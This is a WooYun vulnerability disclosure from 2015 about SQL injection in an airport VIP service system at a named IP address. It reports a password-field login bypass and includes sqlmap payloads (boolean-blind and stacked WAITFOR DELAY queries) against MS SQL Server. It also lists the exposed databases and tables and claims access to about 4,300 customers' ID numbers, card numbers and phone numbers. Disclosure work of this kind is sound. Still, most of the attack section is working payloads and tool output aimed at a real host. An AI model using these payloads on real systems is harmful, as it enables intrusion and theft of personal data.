乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-13: 细节已通知厂商并且等待厂商处理中 2015-12-18: 厂商已经确认,细节仅向厂商公开 2015-12-28: 细节向核心白帽子及相关领域专家公开 2016-01-07: 细节向普通白帽子公开 2016-01-17: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
都是坑人的队友
机场VIP服务系统
http://122.224.232.58/
password处存在注入,'or'1'='1登入后台
4300位VIP客户信息,包括身份证信息和VIP卡号以及部分电话号码
还有部分老外信息
Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTEwNTcyMzk5NDlkZF/LZvLAQjtS8uqCBUouxYjTs1cG/kFoai8qmM7rpj/g&__EVENTVALIDATION=/wEdAARcNpmthiToDsE3afuF/NB1LrflLbaTF4+IO/P7y1Lo5aM0Xx7nPFLadUCblB4PktOinihG6d/Xh3PZm3b5AoMQrdcB3FsoRQ7zEDa3y4b8b6lUEIiLRoGPb1qRWoaAtws=&uid=admin&upwd='or'1'='1' AND 2791=2791 AND 'NyPK'='NyPK&btnLogin=LOGIN Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTEwNTcyMzk5NDlkZF/LZvLAQjtS8uqCBUouxYjTs1cG/kFoai8qmM7rpj/g&__EVENTVALIDATION=/wEdAARcNpmthiToDsE3afuF/NB1LrflLbaTF4+IO/P7y1Lo5aM0Xx7nPFLadUCblB4PktOinihG6d/Xh3PZm3b5AoMQrdcB3FsoRQ7zEDa3y4b8b6lUEIiLRoGPb1qRWoaAtws=&uid=admin&upwd='or'1'='1';WAITFOR DELAY '0:0:5'--&btnLogin=LOGIN---[23:35:05] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2012
DBA权限
数据库信息
available databases [7]:[*] AirVIP[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
Database: AirVIP+------------+---------+| Table | Entries |+------------+---------+| dbo.VIP消费流水表 | 4686 || dbo.VIP客户信息 | 4305 || dbo.module | 8 || dbo.users | 4 |+------------+---------+
过滤参数,再仔细检查下其他的参数,应该还有
危害等级:低
漏洞Rank:3
确认时间:2015-12-18 08:33
员工个人私设站点,非官方行为
暂无